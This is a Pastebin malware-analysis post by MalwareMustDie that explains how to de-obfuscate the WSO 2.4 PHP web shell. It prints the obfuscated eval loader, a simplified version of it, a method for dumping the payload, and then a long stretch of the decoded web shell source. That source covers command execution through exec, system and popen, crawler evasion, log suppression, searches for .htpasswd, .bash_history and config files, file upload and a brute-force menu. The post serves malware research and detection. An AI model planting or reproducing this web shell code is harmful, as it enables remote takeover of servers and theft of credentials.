daily pastebin goal
61%
SHARE
TWEET

#MalwareMustDie! Howto Crack Latest WSO ObfuscationPHP

MalwareMustDie Sep 6th, 2014 (edited) 1,190 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie! WSO latest obfuscation.
  2. # Thank you for the sample to MMD friend!
  3. # Code was analyzed, cracked, explained by:
  4. @unixfreaxjp /malware/temp/001]$ date
  5. Sun Sep  7 02:21:57 JST 2014
  6. #Snapshot PoC:
  7. https://twitter.com/MalwareMustDie/status/508266496099758081
  8. https://twitter.com/unixfreaxjp/status/508312780395405312
  9. VT 22/55: https://www.virustotal.com/en/file/e6d694326c40b5562d1c32ff301ec36111d9c5bbaf46a7b74c862d7a31eb0da9/analysis/1409197668/
  10.  
  11. // ===============================================================
  12. // We received this report of new obfuscated PHP can't be cracked by some
  13. // online tools. It's the WSO and this post will explain how to solve it.
  14. // Below is the evil code:
  15. // ===============================================================
  16.  
  17. <?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC4
  18. 6CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260);$TC9A16C47DA8EEE87
  19. =0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE33
  20. 5260[1])<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$
  21. T4A747C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD9DDE2E=strlen($T059EC46CFE33
  22. 5260);$T43D5686285035C13=__FILE__;$T43D5686285035C13=file_get_contents($T43D5686285
  23. 035C13);$T6BBC58A3B5B11DC4=0;preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv
  24. "),$T43D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159DC7D007D3<$T0D47BDF6FD9DDE2
  25. E;){if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7
  26. =(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$T65CE9F6823D588A7+=ord($T059EC
  27. 46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8
  28. 000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C
  29. 47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87)
  30. {$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;for($T17
  31. D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E7
  32. 2B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26D
  33. D5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E
  34. ;}else{$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB
  35. 8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47
  36. E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T
  37. 17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T
  38. 77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}}else $T7C7E72B89B83E235[$T77605D5F26DD5248++
  39. ]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A5
  40. 5--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5686285035C13=implode("",$T7C7E
  41. 72B89B83E235);$T43D5686285035C13="?".">".$T43D5686285035C13;return $T43D5686285035C
  42. 13;}}}}eval(TC9A16C47DA8EEE87("QAIAPD9waHAgABEkY29sb3IgPSAAACIjZGY1IjsgICRkZWZhdWwA
  43. gHRfYWN0aW9uAbAnRmlsZXNNEAhhbicB+XVzZV9hamF4AhB0cnVAQGUBuWNoYXJzZXQBoCdXaW5kbwEAd3M
  44.  
  45.  // REDACTED FOR SECURITY PURPOSE //
  46.  
  47. xICaxE2VjwSKZoDe0nNEFwQgAXG4iLgXVcyBhdXggfCBncmUnAHAgCRMpLsRwA2AYIiB1bmxpbmso8bsLKQ
  48. pSDsEOjyAnYiywDo1jDoQqUBbRbpkiBGL/HwjxGvAI5TowDrQDMQ6/D8gzJ10Pzw/PrJkG0Q/P36QPxQchI
  49. g/PD8cCE06wHkGuQCBPMyc8qy9yKPNkDeESMCpGqyNSQ6rUE6Ahu1oTMyRhENBhcglCcmF5KLFQInVDsSL/
  50. oXBocF8A4ig4eyksAaEBATzgc2lvbgIFAPQCFBUgXwEkAhIIQVdTT188oFNJT04EEnNhZmVtLLCBWQHSQGl
  51. uaV9nNmAnAXFfAYHDgCAgDFFALiAkcnNlcmlhbGl6LrBhAWEP8P4ndj6gYWzEty8AAhQScQ6AIO+LYTwAIC
  52. kgIAnAJwGwPbRkZWZhdWx0XxJDKSDxUBOFOtaeBgHDJyBJUAL8BMBKkFBPU1RbJwXQFBAk1AMCKxsgCQrSI
  53. AKMJ1NlY0luZm/LgQjgP0EgIQqvCM9DkAjISWQHgCkNUmNhbGxf7CFPQF8MISgnAr8CsQkgSFB0AHA/Pg==
  54. "));?>
  55.  
  56. // ===============================================================
  57. // Unless you have IQ near to 300 so you can read all of the variable
  58. // in obfuscated way, just make it beautiful and "SIMPLIFY" it as:
  59. // ===============================================================
  60.  
  61. <?php
  62. if (!function_exists("var2")) {
  63.     function var2($var1)
  64.     {
  65.         $var1 = base64_decode($var1);
  66.         $var2 = 0;
  67.         $var3 = 0;
  68.         $var4 = 0;
  69.         $var5 = (ord($var1[1]) << 8) + ord($var1[2]);
  70.         $var6 = 3;
  71.         $var7 = 0;
  72.         $var8 = 16;
  73.         $var9 = "";
  74.         $var10 = strlen($var1);
  75.         $var11 = __FILE__;
  76.         $var11 = file_get_contents($var11);
  77.         $var12 = 0;
  78.         preg_match("/(print|sprint|echo)/", $var11, $var12);
  79.         for (; $var6 < $var10;) {
  80.             if (count($var12))  // --- MMD: this is a bullshit..
  81.                 exit;
  82.             if ($var8 == 0) { // --- MMD: This is a delay bullshit..
  83.                 $var5 = (ord($var1[$var6++]) << 8);
  84.                 $var5 += ord($var1[$var6++]);
  85.                 $var8 = 16;
  86.             }
  87.             if ($var5 & 0x8000) { // MMD: glue your eyes in here
  88.                 $var2 = (ord($var1[$var6++]) << 4);
  89.                 $var2 += (ord($var1[$var6]) >> 4);
  90.                 if ($var2) {
  91.                     $var3 = (ord($var1[$var6++]) & 0x0F) + 3;
  92.                     for ($var4 = 0; $var4 < $var3; $var4++)
  93.                         $var9[$var7 + $var4] = $var9[$var7 - $var2 + $var4];
  94.                     $var7 += $var3;
  95.                 } else {
  96.                     $var3 = (ord($var1[$var6++]) << 8);
  97.                     $var3 += ord($var1[$var6++]) + 16;
  98.                     for ($var4 = 0; $var4 < $var3; $var9[$var7 + $var4++] = $var1[$var6]);
  99.                     $var6++;
  100.                     $var7 += $var3;
  101.                 }
  102.             } else
  103.                 $var9[$var7++] = $var1[$var6++];
  104.             $var5 <<= 1;
  105.             $var8--;
  106.             if ($var6 == $var10) {
  107.                 $var11 = implode("", $var9);
  108.                 $var11 = "?" . ">" . $var11;
  109.                 return $var11;
  110.             }
  111.         }
  112.     }
  113. }  // ---MMD: Dont leave that eval↓(unsafe), + never run the var2 manuaally or u lose some  characters..
  114.  
  115. eval(var2("QAIAPD9waHAgABEkY29sb3IgPSAAACIjZGY1IjsgICRkZWZhdWwAgHRfYWN0aW9uAbAnRmls
  116. ZXNNEAhhbicB+XVzZV9hamF4AhB0cnVAQGUBuWNoYXJzZXQBoCdXaW5kbwEAd3MtMTI1MQPxICBpZighZW0
  117. AAHB0eSgkX1NFUlZFUlsnSFQIAFRQX1UA4F9BR0VOVCddKSkgUBB7CfAkBlByQWdlbnRzBNBhcnJhAAB5KC
  118. JHb29nbGUiLCAiU2x1IEBycACRTVNOQm90AKFpYV9hcmMECGhpdmVyAPFZYW5kZXgAoVJhbSwAYmwBUCkKk
  119. AhBcHJlZ19tYXRjaAAAKCcvJyAuIGltcGxvZGUoJwo4fCcsIAeYKQHAJy9pAVELDwsMaGVhCABkZXIoDQIv
  120.  
  121.  // REDACTED FOR SECURITY PURPOSE //
  122.  
  123. BHIkb5/QPSB3c29FeCgiK4EgjAADByAiLgXGm3AuIiAxPi9kZXYvgJ8ysSAyPiYxICaxE2VjwSKZoDe0nNE
  124. FwQgAXG4iLgXVcyBhdXggfCBncmUnAHAgCRMpLsRwA2AYIiB1bmxpbmso8bsLKQpSDsEOjyAnYiywDo1jDo
  125. QqUBbRbpkiBGL/HwjxGvAI5TowDrQDMQ6/D8gzJ10Pzw/PrJkG0Q/P36QPxQchIg/PD8cCE06wHkGuQCBPM
  126. yc8qy9yKPNkDeESMCpGqyNSQ6rUE6Ahu1oTMyRhENBhcglCcmF5KLFQInVDsSL/oXBocF8A4ig4eyksAaEB
  127. ATzgc2lvbgIFAPQCFBUgXwEkAhIIQVdTT188oFNJT04EEnNhZmVtLLCBWQHSQGluaV9nNmAnAXFfAYHDgCA
  128. gDFFALiAkcnNlcmlhbGl6LrBhAWEP8P4ndj6gYWzEty8AAhQScQ6AIO+LYTwAICkgIAnAJwGwPbRkZWZhdW
  129. x0XxJDKSDxUBOFOtaeBgHDJyBJUAL8BMBKkFBPU1RbJwXQFBAk1AMCKxsgCQrSIAKMJ1NlY0luZm/LgQjgP
  130. 0EgIQqvCM9DkAjISWQHgCkNUmNhbGxf7CFPQF8MISgnAr8CsQkgSFB0AHA/Pg=="));
  131. ?>
  132.  
  133. <?php
  134. // ===============================================================
  135. // So now you can see it better =)
  136. // The key to crack is, let the base64_decode do its part to decode
  137. // the blob string and parse it to the function below:
  138. // ===============================================================
  139.  
  140. if ($var5 & 0x8000) {
  141.     $var2 = (ord($var1[$var6++]) << 4);
  142.     $var2 += (ord($var1[$var6]) >> 4);
  143.     if ($var2) {
  144.         $var3 = (ord($var1[$var6++]) & 0x0F) + 3;
  145.         for ($var4 = 0; $var4 < $var3; $var4++)
  146.             $var9[$var7 + $var4] = $var9[$var7 - $var2 + $var4];
  147.         $var7 += $var3;
  148.     } else {
  149.         $var3 = (ord($var1[$var6++]) << 8);
  150.         $var3 += ord($var1[$var6++]) + 16;
  151.         for ($var4 = 0; $var4 < $var3; $var9[$var7 + $var4++] = $var1[$var6]);
  152.         $var6++;
  153.         $var7 += $var3;
  154.     }
  155. } else
  156.     $var9[$var7++] = $var1[$var6++];
  157. $var5 <<= 1;
  158. $var8--;
  159. if ($var6 == $var10) {
  160.     $var11 = implode("", $var9);
  161.     $var11 = "?" . ">" . $var11; }
  162.  
  163. // ===============================================================
  164. // And do your stuff to dump it, to aim the evil code hidden :-))
  165. // Below is a way to safely did that "clean"
  166. // ===============================================================
  167.  
  168. <?php
  169. //  [...]
  170.  
  171. //  (change that eval part into..)
  172. $var99 = var2("QAIAPD9waHA../Pg==");
  173.  
  174. // now let's dump it...
  175. $file = 'dump.txt';
  176. $current = file_get_contents($file);
  177. $current .= $var99;
  178. file_put_contents($file, $current);
  179. ?>
  180.  
  181. // ===============================================================
  182. // Voila! the dump.txt will be filled with the "junk" those moronz hid.
  183. // It's a present from #MalwareMustDie! to good guys & sysadmins in internet,
  184. // here's the "neutralized code" of WSO 2.4 (cant be executed) shared for raising
  185. // awareness, detection ratio & sec research.
  186. // Pls support us by sending samples here: http://www.mediafire.com/dropbox/dropbox.html?nocache=0.47243585277827493&sId=a5a850a1408899fff22c77ea31229b6599c2c6c025042a434133192a363185f0#
  187. // ===============================================================
  188.  
  189. ?><?php
  190. $color            = "#df5";
  191. $default_action   = 'FilesMan';
  192. $default_use_ajax = true;
  193. $default_charset  = 'Windows-1251';
  194. if (!empty($_SERVER['HTTP_USER_AGENT'])) {
  195.     $userAgents = array(
  196.         "Google",
  197.         "Slurp",
  198.         "MSNBot",
  199.         "ia_archiver",
  200.         "Yandex",
  201.         "Rambler"
  202.     );
  203.     if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  204.         header('HTTP/1.0 404 Not Found');
  205.         exit;
  206.     }
  207. }
  208. @session_start();
  209. @ini_set('error_log', NULL);
  210. @ini_set('log_errors', 0);
  211. @ini_set('max_execution_time', 0);
  212. @set_time_limit(0);
  213. @set_magic_quotes_runtime(0);
  214. @define('WSO_VERSION', '2.4');
  215. if (get_magic_quotes_gpc()) {
  216.     function WSOstripslashes($array)
  217.     {
  218.         return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
  219.     }
  220.     $_POST = WSOstripslashes($_POST);
  221. }
  222. if (strtolower(substr(PHP_OS, 0, 3)) == "win")
  223.     $os = 'win';
  224. else
  225.     $os = 'nix';
  226. $safe_mode = @ini_get('safe_mode');
  227. if (!$safe_mode)
  228.     error_reporting(0);
  229. $disable_functions = @ini_get('disable_functions');
  230. $home_cwd          = @getcwd();
  231. if (isset($_POST['c']))
  232.     @chdir($_POST['c']);
  233. $cwd = @getcwd();
  234. if ($os == 'win') {
  235.     $home_cwd = str_replace("\\", "/", $home_cwd);
  236.     $cwd      = str_replace("\\", "/", $cwd);
  237. }
  238. if ($cwd[strlen($cwd) - 1] != '/')
  239.     $cwd .= '/';
  240. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
  241.     $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $GLOBALS['default_use_ajax'];
  242. if ($os == 'win')
  243.     $aliases = array(
  244.         "List Directory" => "dir",
  245.         "Find index.php in current dir" => "dir /s /w /b index.php",
  246.         "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  247.         "Show active connections" => "netstat -an",
  248.         "Show running services" => "net start",
  249.         "User accounts" => "net user",
  250.         "Show computers" => "net view",
  251.         "ARP Table" => "arp -a",
  252.         "IP Configuration" => "ipconfig /all"
  253.     );
  254. else
  255.     $aliases = array(
  256.         "List dir" => "ls -lha",
  257.         "list file attributes on a Linux second extended file system" => "lsattr -va",
  258.         "show opened ports" => "netstat -an | grep -i listen",
  259.         "process status" => "ps aux",
  260.         "Find" => "",
  261.         "find all suid files" => "find / -type f -perm -04000 -ls",
  262.         "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  263.         "find all sgid files" => "find / -type f -perm -02000 -ls",
  264.         "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  265.         "find config.inc.php files" => "find / -type f -name config.inc.php",
  266.         "find config* files" => "find / -type f -name \"config*\"",
  267.         "find config* files in current dir" => "find . -type f -name \"config*\"",
  268.         "find all writable folders and files" => "find / -perm -2 -ls",
  269.         "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  270.         "find all service.pwd files" => "find / -type f -name service.pwd",
  271.         "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  272.         "find all .htpasswd files" => "find / -type f -name .htpasswd",
  273.         "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  274.         "find all .bash_history files" => "find / -type f -name .bash_history",
  275.         "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  276.         "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  277.         "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  278.         "Locate" => "",
  279.         "locate httpd.conf files" => "locate httpd.conf",
  280.         "locate vhosts.conf files" => "locate vhosts.conf",
  281.         "locate proftpd.conf files" => "locate proftpd.conf",
  282.         "locate psybnc.conf files" => "locate psybnc.conf",
  283.         "locate my.conf files" => "locate my.conf",
  284.         "locate admin.php files" => "locate admin.php",
  285.         "locate cfg.php files" => "locate cfg.php",
  286.         "locate conf.php files" => "locate conf.php",
  287.         "locate config.dat files" => "locate config.dat",
  288.         "locate config.php files" => "locate config.php",
  289.         "locate config.inc files" => "locate config.inc",
  290.         "locate config.inc.php" => "locate config.inc.php",
  291.         "locate config.default.php files" => "locate config.default.php",
  292.         "locate config* files " => "locate config",
  293.         "locate .conf files" => "locate '.conf'",
  294.         "locate .pwd files" => "locate '.pwd'",
  295.         "locate .sql files" => "locate '.sql'",
  296.         "locate .htpasswd files" => "locate '.htpasswd'",
  297.         "locate .bash_history files" => "locate '.bash_history'",
  298.         "locate .mysql_history files" => "locate '.mysql_history'",
  299.         "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  300.         "locate backup files" => "locate backup",
  301.         "locate dump files" => "locate dump",
  302.         "locate priv files" => "locate priv"
  303.     );
  304. function wsoHeader()
  305. {
  306.     if (empty($_POST['charset']))
  307.         $_POST['charset'] = $GLOBALS['default_charset'];
  308.     global $color;
  309.     echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title>
  310. <style>
  311. body{background-color:#444;color:#e1e1e1;}
  312. body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  313. table.info{ color:#fff;background-color:#222; }
  314. span,h1,a{ color: $color !important; }
  315. span{ font-weight: bolder; }
  316. h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  317. div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  318. a{ text-decoration:none; }
  319. a:hover{ text-decoration:underline; }
  320. .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  321. .bigarea{ width:100%;height:250px; }
  322. input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
  323. form{ margin:0px; }
  324. #toolsTbl{ text-align:center; }
  325. .toolsInp{ width: 300px }
  326. .main th{text-align:left;background-color:#5e5e5e;}
  327. .main tr:hover{background-color:#5e5e5e}
  328. .l1{background-color:#444}
  329. .l2{background-color:#333}
  330. pre{font-family:Courier,Monospace;}
  331. </style>
  332. <script>
  333.    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  334.    var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
  335.    var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
  336.    var p1_ = '" . ((strpos(@$_POST['p1'], "\n") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
  337.    var p2_ = '" . ((strpos(@$_POST['p2'], "\n") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
  338.    var p3_ = '" . ((strpos(@$_POST['p3'], "\n") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';
  339.    var d = document;
  340.         function set(a,c,p1,p2,p3,charset) {
  341.                 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  342.                 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  343.                 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  344.                 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  345.                 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  346.                 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  347.         }
  348.         function g(a,c,p1,p2,p3,charset) {
  349.                 set(a,c,p1,p2,p3,charset);
  350.                 d.mf.submit();
  351.         }
  352.         function a(a,c,p1,p2,p3,charset) {
  353.                 set(a,c,p1,p2,p3,charset);
  354.                 var params = 'ajax=true';
  355.                 for(i=0;i<d.mf.elements.length;i++)
  356.                         params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  357.                 sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
  358.         }
  359.         function sr(url, params) {     
  360.                 if (window.XMLHttpRequest)
  361.                         req = new XMLHttpRequest();
  362.                 else if (window.ActiveXObject)
  363.                         req = new ActiveXObject('Microsoft.XMLHTTP');
  364.        if (req) {
  365.            req.onreadystatechange = processReqChange;
  366.            req.open('POST', url, true);
  367.            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  368.            req.send(params);
  369.        }
  370.         }
  371.         function processReqChange() {
  372.                 if( (req.readyState == 4) )
  373.                         if(req.status == 200) {
  374.                                 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
  375.                                 var arr=reg.exec(req.responseText);
  376.                                 eval(arr[2].substr(0, arr[1]));
  377.                         } else alert('Request error!');
  378.         }
  379. </script>
  380. <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
  381. <form method=post name=mf style='display:none;'>
  382. <input type=hidden name=a>
  383. <input type=hidden name=c>
  384. <input type=hidden name=p1>
  385. <input type=hidden name=p2>
  386. <input type=hidden name=p3>
  387. <input type=hidden name=charset>
  388. </form>";
  389.     $freeSpace  = @diskfreespace($GLOBALS['cwd']);
  390.     $totalSpace = @disk_total_space($GLOBALS['cwd']);
  391.     $totalSpace = $totalSpace ? $totalSpace : 1;
  392.     $release    = @php_uname('r');
  393.     $kernel     = @php_uname('s');
  394.     $explink    = 'http://exploit-db.com/list.php?description=';
  395.     if (strpos('Linux', $kernel) !== false)
  396.         $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
  397.     else
  398.         $explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
  399.     if (!function_exists('posix_getegid')) {
  400.         $user  = @get_current_user();
  401.         $uid   = @getmyuid();
  402.         $gid   = @getmygid();
  403.         $group = "?";
  404.     } else {
  405.         $uid   = @posix_getpwuid(posix_geteuid());
  406.         $gid   = @posix_getgrgid(posix_getegid());
  407.         $user  = $uid['name'];
  408.         $uid   = $uid['uid'];
  409.         $group = $gid['name'];
  410.         $gid   = $gid['gid'];
  411.     }
  412.     $cwd_links = '';
  413.     $path      = explode("/", $GLOBALS['cwd']);
  414.     $n         = count($path);
  415.     for ($i = 0; $i < $n - 1; $i++) {
  416.         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  417.         for ($j = 0; $j <= $i; $j++)
  418.             $cwd_links .= $path[$j] . '/';
  419.         $cwd_links .= "\")'>" . $path[$i] . "/</a>";
  420.     }
  421.     $charsets     = array(
  422.         'UTF-8',
  423.         'Windows-1251',
  424.         'KOI8-R',
  425.         'KOI8-U',
  426.         'cp866'
  427.     );
  428.     $opt_charsets = '';
  429.     foreach ($charsets as $item)
  430.         $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
  431.     $m = array(
  432.         'Sec. Info' => 'SecInfo',
  433.         'Files' => 'FilesMan',
  434.         'Console' => 'Console',
  435.         'Sql' => 'Sql',
  436.         'Php' => 'Php',
  437.         'Safe mode' => 'SafeMode',
  438.         'String tools' => 'StringTools',
  439.         'Bruteforce' => 'Bruteforce',
  440.         'Network' => 'Network'
  441.     );
  442.     if (!empty($GLOBALS['auth_pass']))
  443.         $m['Logout'] = 'Logout';
  444.     $m['Self remove'] = 'SelfRemove';
  445.     $menu             = '';
  446.     foreach ($m as $k => $v)
  447.         $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
  448.     $drives = "";
  449.     if ($GLOBALS['os'] == 'win') {
  450.         foreach (range('c', 'z') as $drive)
  451.             if (is_dir($drive . ':\\'))
  452.                 $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
  453.     }
  454.     echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#00bb00><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
  455. }
  456. function wsoFooter()
  457. {
  458.     $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='#25ff00'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
  459.     echo "
  460. </div>
  461. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
  462.         <tr>
  463.                 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
  464.                 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  465.         </tr><tr>
  466.                 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
  467.                 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  468.         </tr><tr>
  469.                 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
  470.                 <td><form method='post' ENCTYPE='multipart/form-data'>
  471.                 <input type=hidden name=a value='FilesMAn'>
  472.                 <input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
  473.                 <input type=hidden name=p1 value='uploadFile'>
  474.                 <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
  475.                 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
  476.         </tr></table></div></body></html>";
  477. }
  478. if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) {
  479.     function posix_getpwuid($p)
  480.     {
  481.         return false;
  482.     }
  483. }
  484. if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) {
  485.     function posix_getgrgid($p)
  486.     {
  487.         return false;
  488.     }
  489. }
  490. function wsoEx($in)
  491. {
  492.     $out = '';
  493.     if (function_exists('exec')) {
  494.         @exec($in, $out);
  495.         $out = @join("\n", $out);
  496.     } elseif (function_exists('passthru')) {
  497.         ob_start();
  498.         @passthru($in);
  499.         $out = ob_get_clean();
  500.     } elseif (function_exists('system')) {
  501.         ob_start();
  502.         @system($in);
  503.         $out = ob_get_clean();
  504.     } elseif (function_exists('shell_exec')) {
  505.         $out = shell_exec($in);
  506.     } elseif (is_resource($f = @popen($in, "r"))) {
  507.         $out = "";
  508.         while (!@feof($f))
  509.             $out .= fread($f, 1024);
  510.         pclose($f);
  511.     }
  512.     return $out;
  513. }
  514. function wsoViewSize($s)
  515. {
  516.     if ($s >= 1073741824)
  517.         return sprintf('%1.2f', $s / 1073741824) . ' GB';
  518.     elseif ($s >= 1048576)
  519.         return sprintf('%1.2f', $s / 1048576) . ' MB';
  520.     elseif ($s >= 1024)
  521.         return sprintf('%1.2f', $s / 1024) . ' KB';
  522.     else
  523.         return $s . ' B';
  524. }
  525. function wsoPerms($p)
  526. {
  527.     if (($p & 0xC000) == 0xC000)
  528.         $i = 's';
  529.     elseif (($p & 0xA000) == 0xA000)
  530.         $i = 'l';
  531.     elseif (($p & 0x8000) == 0x8000)
  532.         $i = '-';
  533.     elseif (($p & 0x6000) == 0x6000)
  534.         $i = 'b';
  535.     elseif (($p & 0x4000) == 0x4000)
  536.         $i = 'd';
  537.     elseif (($p & 0x2000) == 0x2000)
  538.         $i = 'c';
  539.     elseif (($p & 0x1000) == 0x1000)
  540.         $i = 'p';
  541.     else
  542.         $i = 'u';
  543.     $i .= (($p & 0x0100) ? 'r' : '-');
  544.     $i .= (($p & 0x0080) ? 'w' : '-');
  545.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
  546.     $i .= (($p & 0x0020) ? 'r' : '-');
  547.     $i .= (($p & 0x0010) ? 'w' : '-');
